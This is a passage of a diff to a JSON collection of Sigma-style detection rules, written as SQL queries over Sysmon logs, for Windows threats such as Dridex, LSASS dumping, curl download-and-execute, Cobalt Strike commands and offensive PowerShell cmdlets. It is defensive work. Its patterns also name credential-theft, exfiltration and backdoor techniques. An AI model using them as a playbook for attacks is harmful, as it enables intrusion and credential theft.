NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1218" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "System administrator Usage" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "status": "experimental", + "description": "Detects usage of wmic to start or stop a service", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "status": "test", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + }, + { + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", + "tags": [ + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR 